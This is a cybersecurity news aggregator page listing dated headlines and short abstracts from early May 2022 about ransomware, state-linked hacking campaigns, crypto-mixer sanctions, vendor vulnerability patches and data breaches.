OpenSea warns of Discord channel compromise Full Text
Abstract
OpenSea, the primary marketplace for buyers and sellers of non-fungible tokens (NFTs), has reported major problems with its Discord support channel owing to a “potential vulnerability” that allowed spambots to post phishing links to other users.Malwarebytes Labs
May 7, 2022 – Cryptocurrency
US Treasury sanctions cryptocurrency mixer Blender Full Text
Abstract
As a result, among other limitations, anyone in the United States or a US person can no longer do any business with Blender without special permission from the government.The Register
May 06, 2022 – Ransomware
The Week in Ransomware - May 6th 2022 - An evolving landscape Full Text
Abstract
Ransomware operations continue to evolve, with new groups appearing and others quietly shutting down their operations or rebranding as new groups.BleepingComputer
May 06, 2022 – Government
U.S. Sanctions Cryptocurrency Mixer Blender for Helping North Korea Launder Millions Full Text
Abstract
The U.S. Treasury Department on Friday moved to sanction virtual currency mixer Blender.io, marking the first time a mixing service has been subjected to economic blockades. The move signals continued efforts on the part of the government to prevent North Korea's Lazarus Group from laundering the funds stolen from the unprecedented hack of Ronin Bridge in late March. The newly imposed sanctions, issued by the U.S. Office of Foreign Assets Control (OFAC), target 45 Bitcoin addresses linked to Blender.io and four new wallets linked to Lazarus Group, an advanced persistent with ties to the Democratic People's Republic of Korea (DPRK). "Blender was used in processing over $20.5 million of the illicit proceeds," the Treasury said , adding it was utilized by DPRK to "support its malicious cyber activities and money-laundering of stolen virtual currency." Cryptocurrency mixers, also called tumblers , are privacy-focused services that allow users to move crThe Hacker News
May 6, 2022 – General
The Declaration for the Future of the Internet Is for Wavering Democracies, Not China and Russia Full Text
Abstract
The declaration means to persuade misbehaving democracies to stop internet transgressions.Lawfare
May 6, 2022 – Attack
How the thriving fraud industry within Facebook attacks independent media Full Text
Abstract
Experts investigate how stolen Facebook accounts are used as part of a well-established fraud industry inside Facebook. No eyebrows were raised in Quriums security operation center when the independent Philippine media outlet Bulatlat once again...Security Affairs
May 06, 2022 – Breach
Ferrari subdomain hijacked to push fake Ferrari NFT collection Full Text
Abstract
One of Ferrari's subdomains was hijacked yesterday to host a scam promoting fake Ferrari NFT collection, according to researchers. The Ethereum wallet associated with the cryptocurrency scam appears to have collected a few hundred dollars before the hacked subdomain was shut down.BleepingComputer
May 06, 2022 – Malware
This New Fileless Malware Hides Shellcode in Windows Event Logs Full Text
Abstract
A new malicious campaign has been spotted taking advantage of Windows event logs to stash chunks of shellcode for the first time in the wild. "It allows the 'fileless' last stage trojan to be hidden from plain sight in the file system," Kaspersky researcher Denis Legezo said in a technical write-up published this week. The stealthy infection process, not attributed to a known actor, is believed to have commenced in September 2021 when the intended targets were lured into downloading compressed .RAR files containing Cobalt Strike and Silent Break . The adversary simulation software modules are then used as a launchpad to inject code into Windows system processes or trusted applications. Also notable is the use of anti-detection wrappers as part of the toolset, suggesting an attempt on the part of the operators to fly under the radar. One of the key methods is to keep encrypted shellcode containing the next-stage malware as 8KB pieces in event logs, a never-bThe Hacker News
May 6, 2022 – Vulnerabilities
QNAP fixes multiple flaws, including a QVR RCE vulnerability Full Text
Abstract
QNAP addressed multiple vulnerabilities, including a critical remote execution flaw affecting the QVR video surveillance solution. QNAP has addressed multiple vulnerabilities, including a critical security issue, tracked as CVE-2022-27588 (CVSS score...Security Affairs
May 06, 2022 – Attack
US agricultural machinery maker AGCO hit by ransomware attack Full Text
Abstract
AGCO, a leading US-based agricultural machinery producer, has announced it was hit by a ransomware attack impacting some of its production facilities.BleepingComputer
May 6, 2022 – Phishing
How Instagram scammers talk users out of their accounts Full Text
Abstract
Regardless of the script they’re following, scammers will say you’ll receive a link on your phone via SMS. They will then ask you not to click the link but merely take a screenshot and send the image back to them.Malwarebytes Labs
May 06, 2022 – Vulnerabilities
QNAP Releases Firmware Patches for 9 New Flaws Affecting NAS Devices Full Text
Abstract
QNAP, Taiwanese maker of network-attached storage (NAS) devices, on Friday released security updates to patch nine security weaknesses, including a critical issue that could be exploited to take over an affected system. "A vulnerability has been reported to affect QNAP VS Series NVR running QVR," QNAP said in an advisory. "If exploited, this vulnerability allows remote attackers to run arbitrary commands." Tracked as CVE-2022-27588 (CVSS score: 9.8), the vulnerability has been addressed in QVR 5.1.6 build 20220401 and later. Credited with reporting the flaw is the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC). Aside from the critical shortcoming, QNAP has also resolved three high-severity and five medium-severity bugs in its software - CVE-2021-38693 (CVSS score: 5.3) - A path traversal vulnerability in thttpd affecting QNAP devices running QTS, QuTS hero, QuTScloud, and QVR Pro Appliance, leading to information disclosure CThe Hacker News
May 6, 2022 – Attack
Anonymous and Ukraine IT Army continue to target Russian entities Full Text
Abstract
The Anonymous collective and the volunteer group Ukraine IT Army continues to launch cyber attacks on Russian entities. The Anonymous collective continues its cyber war on Russian businesses and government organizations. Below is the list of the most...Security Affairs
May 06, 2022 – Vulnerabilities
QNAP fixes critical QVR remote command execution vulnerability Full Text
Abstract
QNAP has released several security advisories today to alert its customers about various fixes for flaws affecting its products. The one that stands out is a critical RCE (remote code execution) in QVR.BleepingComputer
May 6, 2022 – Malware
Steer clear of fake premium mobile app unlockers Full Text
Abstract
The site offers “tweaked apps”, apparently available with a single click and requiring “no jailbreak, no root.” There’s an OnlyFans Premium, Netflix Premium, a Pokemon Go Spoofer Injector, and many more.Malwarebytes Labs
May 06, 2022 – Malware
Researchers Warn of ‘Raspberry Robin’ Malware Spreading via External Drives Full Text
Abstract
Cybersecurity researchers have discovered a new Windows malware with worm-like capabilities and is propagated by means of removable USB devices. Attributing the malware to a cluster named " Raspberry Robin ," Red Canary researchers noted that the worm "leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL." The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to technology and manufacturing sectors. Attack chains pertaining to Raspberry Robin start with connecting an infected USB drive to a Windows machine. Present within the device is the worm payload, which appears as a .LNK shortcut file to a legitimate folder. The worm then takes care of spawning a new process using cmd.exe to read and execute a malicious file stored on the external drive. This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for externThe Hacker News
May 6, 2022 – Malware
NetDooka framework distributed via a pay-per-install (PPI) malware service Full Text
Abstract
Researchers discovered a sophisticated malware framework, dubbed NetDooka, distributed via a pay-per-install (PPI) malware service known as PrivateLoader. Trend Micro researchers uncovered a sophisticated malware framework dubbed NetDooka that is distributed...Security Affairs
May 06, 2022 – Policy and Law
US sanctions Bitcoin laundering service used by North Korean hackers Full Text
Abstract
The US Department of Treasury today sanctioned cryptocurrency mixer Blender.io used last month by the North Korean-backed Lazarus hacking group to launder funds stolen from Axie Infinity's Ronin bridge.BleepingComputer
May 6, 2022 – Attack
Russian Ransomware Group Claims Attack on Bulgarian Refugee Agency Full Text
Abstract
LockBit 2.0 posted a notice to the dark web portal it uses to identify and extort its victims saying it had files from the Bulgarian State Agency for Refugees under the Council of Ministers.CyberScoop
May 06, 2022 – Hacker
Hackers Using PrivateLoader PPI Service to Distribute New NetDooka Malware Full Text
Abstract
A pay-per-install (PPI) malware service known as PrivateLoader has been spotted distributing a "fairly sophisticated" framework called NetDooka, granting attackers complete control over the infected devices. "The framework is distributed via a pay-per-install (PPI) service and contains multiple parts, including a loader, a dropper, a protection driver, and a full-featured remote access trojan (RAT) that implements its own network communication protocol," Trend Micro said in a report published Thursday. PrivateLoader, as documented by Intel 471 in February 2022, functions as a downloader responsible for downloading and installing additional malware onto the infected system, including SmokeLoader, RedLine Stealer, Vidar, Raccoon, GCleaner, and Anubis . Featuring anti-analysis techniques, PrivateLoader is written in the C++ programming language and is said to be in active development, with the downloader malware family gaining traction among multiple threat acThe Hacker News
May 6, 2022 – Vulnerabilities
Vulnerable Docker Installations Are A Playhouse for Malware Attacks Full Text
Abstract
Uptycs researchers identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API. The Uptycs Threat Research team has identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API port...Security Affairs
May 6, 2022 – Cryptocurrency
Crypto Scammers exploit talk on Cryptocurrency Full Text
Abstract
The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them.McAfee
May 06, 2022 – Attack
Experts Uncover New Espionage Attacks by Chinese ‘Mustang Panda’ Hackers Full Text
Abstract
The China-based threat actor known as Mustang Panda has been observed refining and retooling its tactics and malware to strike entities located in Asia, the European Union, Russia, and the U.S. "Mustang Panda is a highly motivated APT group relying primarily on the use of topical lures and social engineering to trick victims into infecting themselves," Cisco Talos said in a new report detailing the group's evolving modus operandi. The group is known to have targeted a wide range of organizations since at least 2012, with the actor primarily relying on email-based social engineering to gain initial access to drop PlugX, a backdoor predominantly deployed for long-term access. Phishing messages attributed to the campaign contain malicious lures masquerading as official European Union reports on the ongoing conflict in Ukraine or Ukrainian government reports, both of which download malware onto compromised machines. Also observed are phishing messages tailored to taThe Hacker News
May 6, 2022 – Attack
Ukraine IT Army hit EGAIS portal impacting Russia’s alcohol distribution Full Text
Abstract
Ukraine IT Army launched massive DDoS attacks on the EGAIS portal that has a crucial role in Russia's alcohol distribution. The collective of hacktivists Ukraine IT Army has launched a series of massive DDoS attacks on the Unified State Automated...Security Affairs
May 6, 2022 – Vulnerabilities
Android’s May 2022 Security Updates Patch 36 Vulnerabilities Full Text
Abstract
The most serious of these security holes, the internet giant notes in an advisory, is a high-severity issue in Android’s Framework component that could be exploited for privilege escalation.Security Week
May 05, 2022 – Vulnerabilities
Google Releases Android Update to Patch Actively Exploited Vulnerability Full Text
Abstract
Google has released monthly security patches for Android with fixes for 37 flaws across different components, one of which is a fix for an actively exploited Linux kernel vulnerability that came to light earlier this year. Tracked as CVE-2021-22600 (CVSS score: 7.8), the vulnerability is ranked "High" for severity and could be exploited by a local user to escalate privileges or deny service. The issue relates to a double-free vulnerability residing in the Packet network protocol implementation in the Linux kernel that could cause memory corruption, potentially leading to denial-of-service or execution of arbitrary code. Patches were released by different Linux distributions, including Debian , Red Hat , SUSE , and Ubuntu in January 2022. "There are indications that CVE-2021-22600 may be under limited, targeted exploitation," Google noted in its Android Security Bulletin for May 2022. Specifics about the nature of the attacks are unknown as yet.The Hacker News
May 05, 2022 – Malware
New Raspberry Robin worm uses Windows Installer to drop malware Full Text
Abstract
Red Canary intelligence analysts have discovered a new Windows malware with worm capabilities that spreads using external USB drives.BleepingComputer
May 5, 2022 – Business
Network Perception Secures $13 Million Series A Funding Round Full Text
Abstract
The funding round was led by The Westly Group, with participation from Energy Impact Partners and other existing investors, including Serra Ventures, Okapi Venture Capital, Energy Foundry, and SaaS Venture Capital.Yahoo Finance
May 05, 2022 – Government
NIST Releases Updated Cybersecurity Guidance for Managing Supply Chain Risks Full Text
Abstract
The National Institute of Standards and Technology (NIST) on Thursday released an updated cybersecurity guidance for managing risks in the supply chain, as it increasingly emerges as a lucrative attack vector. "It encourages organizations to consider the vulnerabilities not only of a finished product they are considering using, but also of its components — which may have been developed elsewhere — and the journey those components took to reach their destination," NIST said in a statement. The new directive outlines major security controls and practices that entities should adopt to identify, assess, and respond to risks at different stages of the supply chain, including the possibility of malicious functionality, flaws in third-party software, insertion of counterfeit hardware, and poor manufacturing and development practices. The development follows an Executive Order issued by the U.S. President on " Improving the Nation's Cybersecurity (14028) " lasThe Hacker News
May 5, 2022 – Vulnerabilities
Google addresses actively exploited Android flaw in the kernel Full Text
Abstract
Google released the May security bulletin for Android, 2022-05-05 security patch level, which fixed an actively exploited Linux kernel flaw. Google has released the second part of the May Security Bulletin for Android, which includes a fix for an actively...Security Affairs
May 5, 2022 – Education
Top Threats your Business Can Prevent on the DNS Level Full Text
Abstract
Web-filtering solutions, a must-have for businesses of any size, will protect your corporate network from multiple origins.Threatpost
May 05, 2022 – Encryption
White House: Prepare for cryptography-cracking quantum computers Full Text
Abstract
President Joe Biden signed a national security memorandum (NSM) on Thursday asking government agencies to implement a set of measures that would mitigate risks posed by quantum computers to US national cyber security.BleepingComputer
May 5, 2022 – Vulnerabilities
Serious Snipe-IT bug exploitable to send password reset email traps Full Text
Abstract
Developers have patched a critical vulnerability in Snipe-IT that could be exploited to send users malicious password reset requests. Grokability’s Snipe-IT is a cloud-based, open-source project for user asset management.The Daily Swig
May 05, 2022 – Solution
Google to Add Passwordless Authentication Support to Android and Chrome Full Text
Abstract
Google today announced plans to implement support for passwordless logins in Android and the Chrome web browser to allow users to seamlessly and securely sign in across different devices and websites irrespective of the platform. "This will simplify sign-ins across devices, websites, and applications no matter the platform — without the need for a single password," Google said . Apple and Microsoft are also expected to extend the support to iOS, macOS, and Windows operating systems as well as Safari and Edge browsers. The common Fast IDentity Online ( FIDO ) sign-in system does away with passwords entirely in favor of displaying a prompt asking a user to unlock the phone when signing into a website or an application. This is made possible by storing a cryptographically-secured FIDO credential called a passkey on the phone that's used to log in to the online account after unlocking the device. "Once you've done this, you won't need your phone again aThe Hacker News
May 5, 2022 – Vulnerabilities
Cisco addresses three bugs in Enterprise NFVIS Software Full Text
Abstract
Cisco addresses three flaws impacting its Enterprise NFV Infrastructure Software (NFVIS) that could allow the compromise of the hosts. Cisco addressed three vulnerabilities, tracked as CVE-2022-20777, CVE-2022-20779, and CVE-2022-20780, affecting...Security Affairs
May 05, 2022 – Government
Ukraine’s IT Army is disrupting Russia’s alcohol distribution Full Text
Abstract
Hacktivists operating on the side of Ukraine have focused their DDoS attacks on a portal that is considered crucial for the distribution of alcoholic beverages in Russia.BleepingComputer
May 5, 2022 – APT
Winnti APT Returns in New Operation CuckooBees Campaign Full Text
Abstract
The covert attack campaign was aimed at multiple technology and manufacturing organizations across North America, Western Europe, and East Asia, with an aim of stealing intellectual property.Cyware Alerts - Hacker News
May 05, 2022 – Education
The Importance of Defining Secure Code Full Text
Abstract
The developers who create the software, applications and programs that drive digital business have become the lifeblood of many organizations. Most modern businesses would not be able to (profitably) function, without competitive applications and programs, or without 24-hour access to their websites and other infrastructure. And yet, these very same touchpoints are also often the gateway that hackers and other nefarious users employ in order to steal information, launch attacks and springboard to other criminal activities such as fraud and ransomware. Successful attacks remain prevalent, even though spending on cybersecurity in most organizations is way up, and even though movements like DevSecOps are shifting security towards those developers who are the lifeblood of business today. Developers understand the importance of security, and overwhelmingly want to deploy secure and quality code, but software vulnerabilities continue to be exploited. Why? For the 2nd year, Secure CoThe Hacker News
May 5, 2022 – Vulnerabilities
A couple of 10-Year-Old flaws affect Avast and AVG antivirus Full Text
Abstract
Researcher discovered a couple of high-severity security flaws that affect a driver used by Avast and AVG antivirus solutions. SentinelOne researcher Kasif Dekel discovered two high-severity security vulnerabilities, tracked as CVE-2022-26522 and CVE-2022-26523,...Security Affairs
May 05, 2022 – Government
NIST updates guidance for defending against supply-chain attacks Full Text
Abstract
The National Institute of Standards and Technology (NIST) has released updated guidance on securing the supply chain against cyberattacks.BleepingComputer
May 5, 2022 – Business
GitHub launches new 2FA mandates for code developers, contributors Full Text
Abstract
On Wednesday, the Microsoft-owned code repository said that changes will be made to existing authentication rules as "part of a platform-wide effort to secure the software ecosystem through improving account security."ZDNet
May 05, 2022 – Vulnerabilities
Researchers Disclose Years-Old Vulnerabilities in Avast and AVG Antivirus Full Text
Abstract
Two high-severity security vulnerabilities, which went undetected for several years, have been discovered in a legitimate driver that's part of Avast and AVG antivirus solutions. "These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded," SentinelOne researcher Kasif Dekel said in a report shared with The Hacker News. Tracked as CVE-2022-26522 and CVE-2022-26523, the flaws reside in a legitimate anti-rootkit kernel driver named aswArPot.sys and are said to have been introduced in Avast version 12.1, which was released in June 2016. Specifically, the shortcomings are rooted in a socket connection handler in the kernel driver that could lead to privilege escalation by running code in the kernel from a non-administrator user, potentially causing the operating system to crash and display a blue screen of death ( BSoD ) eThe Hacker News
May 5, 2022 – Vulnerabilities
F5 warns its customers of tens of flaws in its products Full Text
Abstract
Cybersecurity provider F5 released security patches to address tens of vulnerabilities affecting its products. Security and application delivery solutions provider F5 released its security notification to inform customers that it has released security...Security Affairs
May 05, 2022 – Solution
Microsoft, Apple, and Google to support FIDO passwordless logins Full Text
Abstract
Microsoft, Apple, and Google announced today plans to support a common passwordless sign-in standard (known as passkeys) developed by the World Wide Web Consortium (W3C) and the FIDO Alliance.BleepingComputer
May 5, 2022 – General
7 threat detection challenges CISOs face and what they can do about it Full Text
Abstract
When piecing together an attack campaign, manual correlation and investigation of disparate security sources drastically extends the time and resources required from a CISO and his/her team.Help Net Security
May 05, 2022 – Breach
Heroku Forces User Password Resets Following GitHub OAuth Token Theft Full Text
Abstract
Salesforce-owned subsidiary Heroku on Thursday acknowledged that the theft of GitHub integration OAuth tokens further involved unauthorized access to an internal customer database. The company, in an updated notification , revealed that a compromised token was abused to breach the database and "exfiltrate the hashed and salted passwords for customers' user accounts." As a consequence, Salesforce said it's resetting all Heroku user passwords and ensuring that potentially affected credentials are refreshed. It also emphasized that internal Heroku credentials were rotated and extra detections have been put in place. The attack campaign, which GitHub discovered on April 12, related to an unidentified actor leveraging stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM. The timeline of events as shared by the cloud platform is as follows - April 7, 2022 - ThreatThe Hacker News
May 05, 2022 – Vulnerabilities
Google fixes actively exploited Android kernel vulnerability Full Text
Abstract
Google has released the second part of the May security patch for Android, including a fix for an actively exploited Linux kernel vulnerability.BleepingComputer
May 5, 2022 – Vulnerabilities
Cisco Patches Critical VM Escape in NFV Infrastructure Software Full Text
Abstract
Cisco on Wednesday announced patches to address severe vulnerabilities in Enterprise Network Function Virtualization Infrastructure Software (NFVIS), including a critical bug that allows attackers to escape from a guest VM.Security Week
May 05, 2022 – Breach
Thousands of Borrowers’ Data Exposed from ENCollect Debt Collection Service Full Text
Abstract
An ElasticSearch server instance that was left open on the Internet without a password contained sensitive financial information about loans from Indian and African financial services. The leak, which was discovered by researchers from information security company UpGuard, amounted to 5.8GB and consisted of a total of 1,686,363 records. "Those records included personal information like name, loan amount, date of birth, account number, and more," UpGuard said in a report shared with The Hacker News. "A total of 48,043 unique email addresses were in the collection, some of which were for the product administrators, corporate clients, and collection agents assigned to each case." The exposed instance, used as data storage for a debt collection platform called ENCollect, was detected on February 16, 2022. The leaky server has since been rendered non-accessible to the public as of February 28 following intervention from the Indian Computer Emergency Response TeaThe Hacker News
May 05, 2022 – Malware<br
New NetDooka malware spreads via poisoned search results Full Text
Abstract
A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device.BleepingComputer
May 5, 2022 – Vulnerabilities
A couple of 10-Year-Old flaws affect Avast and AVG antivirus Full Text
Abstract
SentinelOne researcher Kasif Dekel discovered two high-severity security vulnerabilities, tracked as CVE-2022-26522 and CVE-2022-26523, that affect a driver used by Avast and AVG antivirus solutions.Security Affairs
May 05, 2022 – General
Tor project upgrades network speed performance with new system Full Text
Abstract
The Tor Project has published details about a newly introduced system called Congestion Control that promises to eliminate speed limits on the network.BleepingComputer
May 5, 2022 – Policy and Law
Federal Court of Australia finds RI Advice failed to manage cybersecurity risks in landmark decision Full Text
Abstract
The decision comes after a significant number of cyber incidents affected authorized representatives of RI Advice between June 2014 and May 2020, leading ASIC to file against the company for breach of its license obligations.ZDNet
May 05, 2022 – Breach
Heroku admits that customer credentials were stolen in cyberattack Full Text
Abstract
Heroku has now revealed that the stolen GitHub integration OAuth tokens from last month further led to the compromise of an internal customer database. The Salesforce-owned cloud platform acknowledged the same compromised token was used by attackers to exfiltrate customers' hashed and salted passwords from "a database."BleepingComputer
May 4, 2022 – Vulnerabilities
Unpatched DNS Bug Puts Millions of Routers, IoT Devices at Risk Full Text
Abstract
A flaw in all versions of the popular C standard libraries uClibe and uClibe-ng can allow for DNS poisoning attacks against target devices.Threatpost
May 04, 2022 – Vulnerabilities
Cisco Issues Patches for 3 New Flaws Affecting Enterprise NFVIS Software Full Text
Abstract
Cisco Systems on Wednesday shipped security patches to contain three flaws impacting its Enterprise NFV Infrastructure Software ( NFVIS ) that could permit an attacker to fully compromise and take control over the hosts. Tracked as CVE-2022-20777, CVE-2022-20779, and CVE-2022-20780, the vulnerabilities "could allow an attacker to escape from the guest virtual machine (VM) to the host machine, inject commands that execute at the root level, or leak system data from the host to the VM," the company said . Credited for discovering and reporting the issues are Cyrille Chatras, Pierre Denouel, and Loïc Restoux of Orange Group. Updates have been released in version 4.7.1. The networking equipment company said the flaws affect Cisco Enterprise NFVIS in the default configuration. Details of the three bugs are as follows - CVE-2022-20777 (CVSS score: 9.9) - An issue with insufficient guest restrictions that allows an authenticated, remote attacker to escape from the guest VMThe Hacker News
May 04, 2022 – Vulnerabilities
F5 Warns of a New Critical BIG-IP Remote Code Execution Vulnerability Full Text
Abstract
Cloud security and application delivery network ( ADN ) provider F5 on Wednesday released patches to contain 43 bugs spanning its products. Of the 43 issues addressed , one is rated Critical, 17 are rated High, 24 are rated Medium, and one is rated low in severity. Chief among the flaws is CVE-2022-1388 , which carries a CVSS score of 9.8 out of a maximum of 10 and stems from a lack of authentication check, potentially allowing an attacker to take control of an affected system. "This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services," F5 said in an advisory. "There is no data plane exposure; this is a control plane issue only." The security vulnerability, which the company said was discovered internally, affects BIG-IP products with the following versions - 16.1.0 - 16.1.2 15.1.0The Hacker News
May 04, 2022 – Vulnerabilities
F5 warns of critical BIG-IP RCE bug allowing device takeover Full Text
Abstract
F5 has issued a security advisory warning about a flaw that may allow unauthenticated attackers with network access to execute arbitrary system commands, perform file actions, and disable services on BIG-IP.BleepingComputer
May 4, 2022 – APT
APT29 Phishing Campaigns Target Government and Diplomats Full Text
Abstract
The phishing emails pretended to contain policy updates and originated from legitimate email addresses belonging to embassies. The campaign lasted from January to March 2022.Cyware Alerts - Hacker News
May 04, 2022 – Government
SEC Plans to Hire More Staff in Crypto Enforcement Unit to Fight Frauds Full Text
Abstract
The U.S. Securities and Exchange Commission (SEC) on Tuesday announced that it will expand and rebrand its Cyber Unit to fight against cyber-related threats and protect investors in cryptocurrency markets. To that end, the SEC is renaming the Cyber Unit within the Division of Enforcement to Crypto Assets and Cyber Unit and plans to infuse 20 additional positions with the goal of investigating wrongdoing in the crypto markets. The goal, per the agency, is to tackle cryptocurrency fraud and crackdown on malicious actors attempting to profit from crypto marketplaces. The Cyber Unit was instituted in September 2017 with a focus on addressing cyber-based threats and protecting retail investors. But given the dramatic evolution of the digital assets markets in recent years, the new unit is expected to focus on securities law violations pertaining to - Crypto asset offerings Crypto asset exchanges Crypto asset lending and staking products Decentralized finance (DeFi) platformsThe Hacker News
May 4, 2022 – APT
China-linked Winnti APT steals intellectual property from companies worldwide Full Text
Abstract
A sophisticated cyberespionage campaign, dubbed Operation CuckooBees, conducted by the China-linked Winnti group remained undetected since at least 2019. Researchers from Cybereason uncovered a sophisticated cyberespionage campaign, dubbed Operation...Security Affairs
May 4, 2022 – APT
China-linked APT Caught Pilfering Treasure Trove of IP Full Text
Abstract
A state-sponsored threat actor designed a house-of-cards style infection chain to exfiltrate massive troves of highly sensitive data.Threatpost
May 04, 2022 – Vulnerabilities
Cisco fixes NFVIS bugs that help gain root and hijack hosts Full Text
Abstract
Cisco has addressed several security flaws found in the Enterprise NFV Infrastructure Software (NFVIS), a solution that helps virtualize network services for easier management of virtual network functions (VNFs).BleepingComputer
May 4, 2022 – Hacker
Chinese Naikon Group Back with New Espionage Attack Full Text
Abstract
The spear-phishing email consists of a weaponized document pretending to be a call for tender. Two payloads are hidden in the document as document properties.Cyware Alerts - Hacker News
May 04, 2022 – Hacker
Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies Full Text
Abstract
An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019. Dubbed " Operation CuckooBees " by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information. Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America. "The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data," the researchers said . "In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company's business units, network architecture, user accounts and credentials, employee emails, and customer data." Winnti, also tracked by otherThe Hacker News
May 4, 2022 – Denial Of Service
Pro-Ukraine attackers compromise Docker images to launch DDoS attacks on Russian sites Full Text
Abstract
Pro-Ukraine hackers are using Docker images to launch distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites. Pro-Ukraine hackers, likely linked to Ukraine IT Army, are using Docker images to launch...Security Affairs
May 4, 2022 – General
The Future of Executive Protection is Digital Full Text
Abstract
As threats to an executive’s safety and security increase, organizations should look to digital executive protection to help reduce risks manifesting in both the physical and digital worlds.Threatpost
May 04, 2022 – Malware
Pixiv, DeviantArt artists hit by NFT job offers pushing malware Full Text
Abstract
Users on Pixiv, DeviantArt, and other creator-oriented online platforms report receiving multiple messages from people claiming to be from the "Cyberpunk Ape Executives" NFT project, with the main goal to infect artists' devices with information-stealing malware.BleepingComputer
May 4, 2022 – APT
China-linked Curious Gorge APT Targeted Russian Government Agencies Full Text
Abstract
Google Threat Analysis Group (TAG) reported that an APT group linked to China’s People’s Liberation Army Strategic Support Force (PLA SSF), tracked as Curious Gorge, is targeting Russian government agencies.Security Affairs
May 04, 2022 – Vulnerabilities
Critical RCE Bug Reported in dotCMS Content Management Software Full Text
Abstract
A pre-authenticated remote code execution vulnerability has been disclosed in dotCMS, an open-source content management system written in Java and " used by over 10,000 clients in over 70 countries around the globe, from Fortune 500 brands and mid-sized businesses." The critical flaw, tracked as CVE-2022-26352 , stems from a directory traversal attack when performing file uploads, enabling an adversary to execute arbitrary commands on the underlying system. "An attacker can upload arbitrary files to the system," Shubham Shah of Assetnote said in a report. "By uploading a JSP file to the tomcat's root directory, it is possible to achieve code execution, leading to command execution." In other words, the arbitrary file upload flaw can be abused to replace already existing files in the system with a web shell, which can then be used to gain persistent remote access. Although the exploit made it possible to write to arbitrary JavaScript files beiThe Hacker News
May 4, 2022 – APT
Experts linked multiple ransomware strains North Korea-backed APT38 group Full Text
Abstract
Researchers from Trellix linked multiple ransomware strains to the North Korea-backed APT38 group. The ransomware was employed in attacks on financial institutions, experts estimated that APT38 (Unit 180 of North Korea's cyber-army Bureau 121) has stolen...Security Affairs
May 04, 2022 – Attack
Attackers hijack UK NHS email accounts to steal Microsoft logins Full Text
Abstract
For about half a year, work email accounts belonging to over 100 employees of the National Health System (NHS) in the U.K. were used in several phishing campaigns, some aiming to steal Microsoft logins.BleepingComputer
May 4, 2022 – Attack
China-linked Winnti Hackers Perform Rare Windows Mechanism Abuse in Three-year-long Campaign Full Text
Abstract
According to researchers, the attacks have been focused on infiltrating the networks of technology and manufacturing companies in Europe, Asia, and North America, focusing on stealing sensitive proprietary information.ZDNet
May 04, 2022 – Hacker
Ukraine War Themed Files Become the Lure of Choice for a Wide Range of Hackers Full Text
Abstract
A growing number of threat actors are using the ongoing Russo-Ukrainian war as a lure in various phishing and malware campaigns, even as critical infrastructure entities continue to be heavily targeted. "Government-backed actors from China, Iran, North Korea and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links," Google Threat Analysis Group's (TAG) Billy Leonard said in a report. "Financially motivated and criminal actors are also using current events as a means for targeting users," Leonard added. One notable threat actor is Curious Gorge, which TAG has attributed to China People's Liberation Army Strategic Support Force (PLA SSF) and has been observed striking government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. Attacks aimed at Russia have singled out several governmental entitiThe Hacker News
May 4, 2022 – Ransomware
An expert shows how to stop popular ransomware samples via DLL hijacking Full Text
Abstract
A security researcher discovered that samples of Conti, REvil, LockBit ransomware were vulnerable to DLL hijacking. The security researcher John Page aka (hyp3rlinx) discovered that malware from multiple ransomware operations, including Conti, REvil,...Security Affairs
May 04, 2022 – Attack
Heroku forces user password resets but fails to explain why Full Text
Abstract
Salesforce-owned Heroku is performing a forced password reset on a subset of user accounts in response to last month's security incident while providing no information as to why they are doing so other than vaguely mentioning it is to further secure accounts.BleepingComputer
May 4, 2022 – Government
SEC nearly doubles size of crypto and cyber enforcement unit Full Text
Abstract
The unit, formerly known as the cyber unit, will be renamed as the crypto assets and cyber unit and will continue to reside in the Division of Enforcement. It will also gain 20 additional team members, taking the unit's total headcount to 50.ZDNet
May 04, 2022 – Government
FBI says business email compromise is a $43 billion scam Full Text
Abstract
The Federal Bureau of Investigation (FBI) said today that the amount of money lost to business email compromise (BEC) scams continues to grow each year, with a 65% increase in the identified global exposed losses between July 2019 and December 2021.BleepingComputer
May 4, 2022 – Phishing
Watch Out! Verified Twitter Accounts Are Targeted in Phishing Attacks Full Text
Abstract
The targets were notified that there was a problem with their verified Twitter account and were advised to click on the ‘Check notifications’ button to find out more about what is wrong.Heimdal Security
May 04, 2022 – Criminals
Hackers stole data undetected from US, European orgs since 2019 Full Text
Abstract
Cybersecurity analysts have exposed a lengthy operation attributed to the group of Chinese hackers known as "Winnti" and tracked as APT41, which focused on stealing intellectual property assets like patents, copyrights, trademarks, and other types of valuable data.BleepingComputer
May 4, 2022 – Attack
Transport for NSW struck by cyberattack Full Text
Abstract
Transport for NSW has confirmed its Authorised Inspection Scheme (AIS) online application was impacted by a cyber incident in early April. The AIS authorizes examiners to inspect vehicles to ensure a minimum safety standard.ZDNet
May 04, 2022 – Business
GitHub to require 2FA from active developers by the end of 2023 Full Text
Abstract
GitHub announced today that all users who contribute code on its platform (an estimated 83 million developers in total) will be required to enable two-factor authentication (2FA) on their accounts by the end of 2023.BleepingComputer
May 4, 2022 – Business
Identity-Based Infrastructure Access Firm Teleport Raises $110 Million Full Text
Abstract
